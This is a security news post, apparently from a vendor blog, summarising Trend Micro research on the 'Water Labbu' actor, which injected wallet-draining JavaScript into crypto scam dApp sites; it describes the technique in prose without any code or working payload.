ClickCease Hackers compromise scam sites to redirect crypto transactions

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

Hackers compromise scam sites to redirect crypto transactions

October 18, 2022 - TuxCare PR Team

According to Trend Micro researchers, a threat actor identified as ‘Water Labbu’ is hacking into cryptocurrency scam sites to inject malicious JavaScript with the aim of stealing money from victims scammed.

It is important to note that ‘dApps’ (decentralized applications) are used for liquidity mining. Liquidity mining means that investors lend their cryptocurrencies to a decentralized exchange in exchange for high returns generated via trading fees.

But fraudsters have developed scam versions of ‘dApps’, which impersonate cryptocurrency liquidity mining services to steal victims’ cryptocurrency investments.

As soon as an investor connects his Waller to the dApp, Water Labbu’s script detects if it contains many cryptocurrencies and, if so, tries to steal it using several methods.

Already Water Labbu is said to have made at least $316,728 in profit from nine identified victims while compromising at least 45 fraudulent websites.

In order to compromise scam sites, the threat actor locates scam sites for cryptocurrencies and injects the “dApps” with malicious scripts that merge easily with the site’s systems.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.

Once the balance is above 0.005 ETH or 22,000 USDT, the target becomes valid for Water Labbu, and the script then determines whether the victim is using Windows or a mobile OS (Android, iOS). If the victim is on a mobile device, Water Labbu malicious script sends a transaction authorization request via the dApp website, making it look as if it came from the scam website.

If the recipient agrees to the transaction, the malicious script will empty the wallet of available funds and send it to an address of Water Labbu.

The sources for this piece include an article in BleepingComputer.

Summary
Hackers compromise scam sites to redirect crypto transactions
Article Name
Hackers compromise scam sites to redirect crypto transactions
Description
According to Trend Micro researchers, a threat actor identified as 'Water Labbu' is hacking into cryptocurrency scam sites to inject malicious JavaScript with the aim of stealing money from victims scammed.
Author
Publisher Name
Tuxcare
Publisher Logo

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Learn About Live Patching with TuxCare

Become a TuxCare Guest Writer

Get started

Mail

Join

4,500

Linux & Open Source
Professionals!

Subscribe to
our newsletter